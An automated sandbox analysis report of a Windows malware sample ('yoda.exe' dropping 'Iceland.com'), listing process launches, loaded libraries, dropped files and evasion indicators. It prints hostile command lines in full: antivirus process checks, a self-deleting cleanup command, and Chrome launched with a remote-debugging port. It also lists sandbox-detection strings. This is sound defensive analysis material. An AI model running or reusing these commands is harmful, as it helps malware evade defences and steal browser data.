                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2176,i,7491124011227582456,6124971309095306324,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\314782\Iceland.com" & rd /s /q "C:\ProgramData\4EK6XL68GLNY" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\yoda.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 314782Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "INSPIRED" Interview Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther AJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Iceland.com AJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\314782\Iceland.com" & rd /s /q "C:\ProgramData\4EK6XL68GLNY" & exitJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2176,i,7491124011227582456,6124971309095306324,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: yoda.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cryptosetup.pdbGCTL source: Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, 2NG4E3.10.dr
                Source: Binary string: cryptosetup.pdb source: Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, 2NG4E3.10.dr
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: yoda.exeStatic PE information: real checksum: 0xd304c should be: 0xd780d
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A40DE6 push ecx; ret 10_2_00A40DF9

                Persistence and Installation Behavior

                barindex
                Drops PE files with a suspicious file extension
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\314782\Iceland.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\314782\Iceland.comJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile created: C:\ProgramData\4EK6XL68GLNY\2NG4E3Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile created: C:\ProgramData\4EK6XL68GLNY\2NG4E3Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile created: C:\ProgramData\4EK6XL68GLNY\2NG4E3Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00AB26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00AB26DD
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A3FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00A3FC7C
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_10-105328
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: Iceland.com, 0000000A.00000003.1950144358.0000000003974000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comDropped PE file which has not been started: C:\ProgramData\4EK6XL68GLNY\2NG4E3Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comAPI coverage: 3.7 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 796Thread sleep count: 90 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
                Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A8DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00A8DC54
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A9A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A9A087
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A9A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A9A1E2
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A8E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00A8E472
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A9A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00A9A570
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A966DC FindFirstFileW,FindNextFileW,FindClose,10_2_00A966DC
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A5C622 FindFirstFileExW,10_2_00A5C622
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00A973D4
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A97333 FindFirstFileW,FindClose,10_2_00A97333
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A8D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00A8D921
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A25FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00A25FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\314782Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\314782\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: chrome.exe, 0000000F.00000002.2217707791.0000027800B14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: chrome.exe, 0000000F.00000002.2220782297.0000027801144000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
                Source: Iceland.com, 0000000A.00000002.2868129868.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000002.2868559733.0000000000F10000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000002.2868559733.0000000000F25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: chrome.exe, 0000000F.00000002.2218481986.0000027800CD4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=5bcbdd8e-e3ac-4636-9808-539ae02e728e
                Source: chrome.exe, 0000000F.00000002.2211179804.000001DF5857E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A9F4FF BlockInput,10_2_00A9F4FF
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A2338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00A2338B
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A45058 mov eax, dword ptr fs:[00000030h]10_2_00A45058
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A820AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,10_2_00A820AA
